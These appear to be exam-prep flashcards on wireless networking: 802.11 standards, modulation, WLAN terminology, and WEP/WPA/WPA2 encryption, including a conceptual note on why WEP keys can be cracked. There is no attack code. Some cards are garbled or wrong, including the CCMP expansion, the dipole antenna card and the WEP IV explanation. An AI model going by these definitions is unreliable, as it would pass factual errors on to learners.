Chapter 7 - Wireless Network Hacking Flashcards
List the speeds, frequencies and modulation type for the following
- 11a
- 11b
- 11g
- 11n
- 11ac
- 11a - 54, 5Ghz, OFDM
- 11b - 11, 2.4Ghz, DSSS
- 11g - 54, 2.4Ghz, OFDM and DSSS
- 11n - 100+, 2.4 - 5Ghz, OFDM
- 11ac - 1000, 5Ghz, QAM
Exam Tip
- 11i
- 16
- 11i - amendment for security mechanisms on WLANs
802. 16 - WiMax, speeds started at 40Mbs and are moving to gigabit
Define Orthogonal Frequency Division Multiplexing (OFDM)
several waveforms simultaneously carry messages.
Transmission media is divided into a series of frequency bands that don’t overlap each other and each can carry a separate signal
Define Direct Sequence Spread Spectrum (DSSS)
DSSS combines all available waveforms into a single purpose. Entire bandwidth can be used at once for the delivery of a message
Define Basic Service Area (BSA)
Define Basic Service Set (BSS)
BSA - single access point coverage
BSS - communication between single AP and its clients
Define Extended Service Set (ESS)
when multiple AP’s are setup with correct channels and a client can associate and disassociate from each one as it roams between them.
Define BSSID
the MAC Address of the WAP at the center of your BSS
Define dipole and Parabolic dish antennas
dipole - 23 signal ‘towers’ and are omnidirectional
parabolic dish - like a satellite dish, directional, tremendous range
Define Service Set Identifier (SSID)
text string that identifies the wireless network
Compare Association and Authentication for a WLAN
Association - act of client connecting to an AP
Authentication - client is identified before it can access anything on the network
Wired Equivalent Privacy (WEP) encryption notes
Intended to only give equivalent privacy as a wired hub
uses Initialization Vector (IV)
WEP IV issues
IV does a 32 bit integrity check value (ICV) and appends it to data payload
the provides 24 bit IV, combined with key in RC4
key stream is encrypted by XOR and combined with ICV.
But IV is small and RC4 easy to break. So WEP is easily cracked. Attacker captures enough packets to analyze IV and gets the key
WiFi Protected Access (WPA)
Uses TKIP, a 128 bit key and client’s MAC address for encryption
Changes the key every 10,000 packets (hence Temporary)
Keys are transferred back and forth during EAP authentication session, which 4 step handshake proves the client belongs to the AP and vice versa
TKIP
Temporal Key Integrity Protocol
Originally had some vulnerabilities
WiFi Protected Access 2 (WPA2)
Uses AES, FIPS 140-2 compliant
WPA2-Enterprise - you can tie EAP or RADIUS server into authentication
WPA2-Personal - uses preshared key
Uses CCMP (Cipher Blockchaining Message Authentication Code Protocol). Uses hashes (aka message integrity codes) to ensure integrity